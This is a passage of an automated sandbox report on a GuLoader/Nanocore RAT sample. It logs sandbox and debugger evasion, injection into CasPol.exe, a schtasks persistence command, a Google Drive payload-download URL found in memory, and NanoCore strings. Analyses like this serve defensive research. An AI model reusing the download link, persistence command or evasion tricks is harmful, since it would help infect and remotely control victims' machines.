            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion:

            barindex
            Tries to detect Any.runShow sources
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Program Files\qga\qga.exe
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Program Files\qga\qga.exe
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Program Files\qga\qga.exe
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
            Source: PEGASUS.exe, 00000014.00000002.79927620516.0000000000700000.00000004.00000010.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32APPDATA=WINDIR=\MICROSOFT.NET\FRAMEWORK\V2.0.50727\CASPOL.EXE\SYSWOW64\MSVBVM60.DLLWINDIR=\MICROSOFT.NET\FRAMEWORK\V2.0.50727\CASPOL.EXE\SYSWOW64\MSVBVM60.DLL
            Source: PEGASUS.exe, 00000013.00000002.79811466597.0000000000643000.00000004.00000020.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE```8I
            Source: PEGASUS.exe, 00000014.00000002.79927288896.0000000000600000.00000004.00000020.sdmpBinary or memory string: GRAM FILES\QEMU-GA\QEMU-GA.EXE
            Source: CasPol.exe, 00000017.00000002.79853001632.0000000000F00000.00000004.00000001.sdmp, CasPol.exe, 0000001B.00000002.79968686867.0000000000F40000.00000004.00000001.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32APPDATA=\PEGASUS.EXE\MAGTTEKNIKHTTPS://DRIVE.GOOGLE.COM/UC?EXPORT=DOWNLOAD&ID=1OM9HN-PPSGZSYLC6PHCCZPR7HMTVKRGX
            Source: PEGASUS.exe, 00000013.00000002.79811196931.0000000000570000.00000004.00000010.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32APPDATA=WINDIR=\MICROSOFT.NET\FRAMEWORK\V2.0.50727\CASPOL.EXE\SYSWOW64\MSVBVM60.DLLWINDIR=\MICROSOFT.NET\FRAMEWORK\V2.0.50727\CASPOL.EXE\SYSWOW64\MSVBVM60.DLLWINDIR=\MICROSOFT.NET\FRAMEWORK\V2.0.50727\CASPOL.EXE\SYSWOW64\MSVBVM60.DLL
            Source: PEGASUS.exe, 00000013.00000002.79811196931.0000000000570000.00000004.00000010.sdmp, PEGASUS.exe, 00000014.00000002.79927620516.0000000000700000.00000004.00000010.sdmp, CasPol.exe, 00000017.00000002.79853001632.0000000000F00000.00000004.00000001.sdmp, CasPol.exe, 0000001B.00000002.79968686867.0000000000F40000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
            Source: PEGASUS.exe, 00000013.00000002.79811466597.0000000000643000.00000004.00000020.sdmpBinary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
            Source: Doc0011222003.exe, 00000002.00000002.78191921846.000000000061D000.00000004.00000020.sdmpBinary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE-*
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 4924Thread sleep time: -1844674407370954s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 7580Thread sleep time: -140000s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 2720Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 5060Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 7184Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeWindow / User API: threadDelayed 1347
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeWindow / User API: threadDelayed 518
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeWindow / User API: foregroundWindowGot 1185
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeWindow / User API: foregroundWindowGot 426
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information queried: ProcessInformation
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeSystem information queried: ModuleInformation
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Windows\Microsoft.NET\Framework\
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Windows\assembly\NativeImages_v2.0.50727_32\System\06e54f5fa1f15dd558eaf403cdcacad3\System.ni.dll
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\5085e86702d2182b0d9417971c65ded2\System.Drawing.ni.dll
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\ae952be8fa59744d6333aed90b72f162\System.Windows.Forms.ni.dll
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Windows\Microsoft.NET\
            Source: Doc0011222003.exe, 00000002.00000002.78194937276.0000000003179000.00000004.00000001.sdmp, PEGASUS.exe, 00000013.00000002.79814052365.00000000031F9000.00000004.00000001.sdmp, PEGASUS.exe, 00000014.00000002.79929761260.0000000003279000.00000004.00000001.sdmp, CasPol.exe, 00000017.00000002.79855507105.0000000002C89000.00000004.00000001.sdmp, CasPol.exe, 0000001B.00000002.79970754366.0000000002CF9000.00000004.00000001.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
            Source: PEGASUS.exe, 00000014.00000002.79927288896.0000000000600000.00000004.00000020.sdmpBinary or memory string: gram Files\Qemu-ga\qemu-ga.exe
            Source: CasPol.exe, 00000017.00000002.79853001632.0000000000F00000.00000004.00000001.sdmp, CasPol.exe, 0000001B.00000002.79968686867.0000000000F40000.00000004.00000001.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32APPDATA=\PEGASUS.exe\MAGTTEKNIKhttps://drive.google.com/uc?export=download&id=1oM9hn-PPsGzsYLC6phCcZPr7HMtVKRgX
            Source: Doc0011222003.exe, 00000002.00000002.78194937276.0000000003179000.00000004.00000001.sdmp, PEGASUS.exe, 00000013.00000002.79814052365.00000000031F9000.00000004.00000001.sdmp, PEGASUS.exe, 00000014.00000002.79929761260.0000000003279000.00000004.00000001.sdmp, CasPol.exe, 00000017.00000002.79855507105.0000000002C89000.00000004.00000001.sdmp, CasPol.exe, 0000001B.00000002.79970754366.0000000002CF9000.00000004.00000001.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
            Source: CasPol.exe, 0000001B.00000002.79970754366.0000000002CF9000.00000004.00000001.sdmpBinary or memory string: vmicshutdown
            Source: CasPol.exe, 00000017.00000002.79854564800.00000000011AB000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW<
            Source: Doc0011222003.exe, 00000002.00000002.78194937276.0000000003179000.00000004.00000001.sdmp, PEGASUS.exe, 00000013.00000002.79814052365.00000000031F9000.00000004.00000001.sdmp, PEGASUS.exe, 00000014.00000002.79929761260.0000000003279000.00000004.00000001.sdmp, CasPol.exe, 00000017.00000002.79855507105.0000000002C89000.00000004.00000001.sdmp, CasPol.exe, 0000001B.00000002.79970754366.0000000002CF9000.00000004.00000001.sdmpBinary or memory string: Hyper-V Volume Shadow Copy Requestor
            Source: PEGASUS.exe, 00000013.00000002.79811466597.0000000000643000.00000004.00000020.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe```8I
            Source: PEGASUS.exe, 00000013.00000002.79811196931.0000000000570000.00000004.00000010.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32APPDATA=windir=\Microsoft.NET\Framework\v2.0.50727\caspol.exe\syswow64\msvbvm60.dllwindir=\Microsoft.NET\Framework\v2.0.50727\caspol.exe\syswow64\msvbvm60.dllwindir=\Microsoft.NET\Framework\v2.0.50727\caspol.exe\syswow64\msvbvm60.dll
            Source: Doc0011222003.exe, 00000002.00000002.78194937276.0000000003179000.00000004.00000001.sdmp, PEGASUS.exe, 00000013.00000002.79814052365.00000000031F9000.00000004.00000001.sdmp, PEGASUS.exe, 00000014.00000002.79929761260.0000000003279000.00000004.00000001.sdmp, CasPol.exe, 00000017.00000002.79855507105.0000000002C89000.00000004.00000001.sdmp, CasPol.exe, 0000001B.00000002.79970754366.0000000002CF9000.00000004.00000001.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
            Source: Doc0011222003.exe, 00000002.00000002.78194937276.0000000003179000.00000004.00000001.sdmp, PEGASUS.exe, 00000013.00000002.79814052365.00000000031F9000.00000004.00000001.sdmp, PEGASUS.exe, 00000014.00000002.79929761260.0000000003279000.00000004.00000001.sdmp, CasPol.exe, 00000017.00000002.79855507105.0000000002C89000.00000004.00000001.sdmp, CasPol.exe, 0000001B.00000002.79970754366.0000000002CF9000.00000004.00000001.sdmpBinary or memory string: Hyper-V Time Synchronization Service
            Source: CasPol.exe, 0000001B.00000002.79970754366.0000000002CF9000.00000004.00000001.sdmpBinary or memory string: vmicvss
            Source: CasPol.exe, 0000000D.00000003.78460233037.000000000154B000.00000004.00000001.sdmp, CasPol.exe, 00000017.00000002.79853729008.000000000111C000.00000004.00000020.sdmp, CasPol.exe, 0000001B.00000002.79968890359.0000000001077000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW
            Source: PEGASUS.exe, 00000014.00000002.79927620516.0000000000700000.00000004.00000010.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32APPDATA=windir=\Microsoft.NET\Framework\v2.0.50727\caspol.exe\syswow64\msvbvm60.dllwindir=\Microsoft.NET\Framework\v2.0.50727\caspol.exe\syswow64\msvbvm60.dll
            Source: PEGASUS.exe, 00000013.00000002.79811196931.0000000000570000.00000004.00000010.sdmp, PEGASUS.exe, 00000014.00000002.79927620516.0000000000700000.00000004.00000010.sdmp, CasPol.exe, 00000017.00000002.79853001632.0000000000F00000.00000004.00000001.sdmp, CasPol.exe, 0000001B.00000002.79968686867.0000000000F40000.00000004.00000001.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: Doc0011222003.exe, 00000002.00000002.78194937276.0000000003179000.00000004.00000001.sdmp, PEGASUS.exe, 00000013.00000002.79814052365.00000000031F9000.00000004.00000001.sdmp, PEGASUS.exe, 00000014.00000002.79929761260.0000000003279000.00000004.00000001.sdmp, CasPol.exe, 00000017.00000002.79855507105.0000000002C89000.00000004.00000001.sdmp, CasPol.exe, 0000001B.00000002.79970754366.0000000002CF9000.00000004.00000001.sdmpBinary or memory string: Hyper-V Data Exchange Service
            Source: Doc0011222003.exe, 00000002.00000002.78191921846.000000000061D000.00000004.00000020.sdmpBinary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exe-*
            Source: Doc0011222003.exe, 00000002.00000002.78194937276.0000000003179000.00000004.00000001.sdmp, PEGASUS.exe, 00000013.00000002.79814052365.00000000031F9000.00000004.00000001.sdmp, PEGASUS.exe, 00000014.00000002.79929761260.0000000003279000.00000004.00000001.sdmp, CasPol.exe, 00000017.00000002.79855507105.0000000002C89000.00000004.00000001.sdmp, CasPol.exe, 0000001B.00000002.79970754366.0000000002CF9000.00000004.00000001.sdmpBinary or memory string: Hyper-V Heartbeat Service
            Source: Doc0011222003.exe, 00000002.00000002.78194937276.0000000003179000.00000004.00000001.sdmp, PEGASUS.exe, 00000013.00000002.79814052365.00000000031F9000.00000004.00000001.sdmp, PEGASUS.exe, 00000014.00000002.79929761260.0000000003279000.00000004.00000001.sdmp, CasPol.exe, 00000017.00000002.79855507105.0000000002C89000.00000004.00000001.sdmp, CasPol.exe, 0000001B.00000002.79970754366.0000000002CF9000.00000004.00000001.sdmpBinary or memory string: Hyper-V Guest Service Interface
            Source: PEGASUS.exe, 00000013.00000002.79811466597.0000000000643000.00000004.00000020.sdmpBinary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: CasPol.exe, 0000001B.00000002.79970754366.0000000002CF9000.00000004.00000001.sdmpBinary or memory string: vmicheartbeat

            Anti Debugging:

            barindex
            Hides threads from debuggersShow sources
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeThread information set: HideFromDebugger
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeThread information set: HideFromDebugger
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeThread information set: HideFromDebugger
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess token adjusted: Debug
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess queried: DebugPort
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess queried: DebugPort
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess queried: DebugPort
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeMemory allocated: page read and write | page guard
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "DSL Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmpF23C.tmp
            Source: CasPol.exe, 0000000D.00000003.78992046780.0000000001535000.00000004.00000001.sdmpBinary or memory string: Program Manager
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information:

            barindex
            GuLoader behavior detectedShow sources
            Source: Initial fileSignature Results: GuLoader behavior
            Yara detected Nanocore RATShow sources
            Source: Yara matchFile source: 23.2.CasPol.exe.1f189ca6.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.2.CasPol.exe.1f18eadc.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 27.2.CasPol.exe.1f0aeadc.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.2.CasPol.exe.1f18eadc.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 27.2.CasPol.exe.1f0a9ca6.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.2.CasPol.exe.1f193105.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 27.2.CasPol.exe.1f0aeadc.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 27.2.CasPol.exe.1f0b3105.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000017.00000002.79863339274.000000001E141000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000002.79863641955.000000001F141000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001B.00000002.79978855466.000000001F061000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001B.00000002.79978540386.000000001E061000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 6916, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 7356, type: MEMORYSTR

            Remote Access Functionality:

            barindex
            Detected Nanocore RatShow sources
            Source: CasPol.exe, 00000017.00000002.79863339274.000000001E141000.00000004.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
            Source: CasPol.exe, 00000017.00000002.79863339274.000000001E141000.00000004.00000001.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
            Source: CasPol.exe, 0000001B.00000002.79978855466.000000001F061000.00000004.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
            Source: CasPol.exe, 0000001B.00000002.79978855466.000000001F061000.00000004.00000001.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
            Yara detected Nanocore RATShow sources
            Source: Yara matchFile source: 23.2.CasPol.exe.1f189ca6.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.2.CasPol.exe.1f18eadc.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 27.2.CasPol.exe.1f0aeadc.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.2.CasPol.exe.1f18eadc.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 27.2.CasPol.exe.1f0a9ca6.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.2.CasPol.exe.1f193105.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 27.2.CasPol.exe.1f0aeadc.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 27.2.CasPol.exe.1f0b3105.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000017.00000002.79863339274.000000001E141000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000002.79863641955.000000001F141000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001B.00000002.79978855466.000000001F061000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001B.00000002.79978540386.000000001E061000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 6916, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 7356, type: MEMORYSTR

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid AccountsScheduled Task/Job1Scheduled Task/Job1Process Injection12Masquerading1Input Capture11Security Software Discovery411Remote ServicesInput Capture11Exfiltration Over Other Network MediumEncrypted Channel11Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
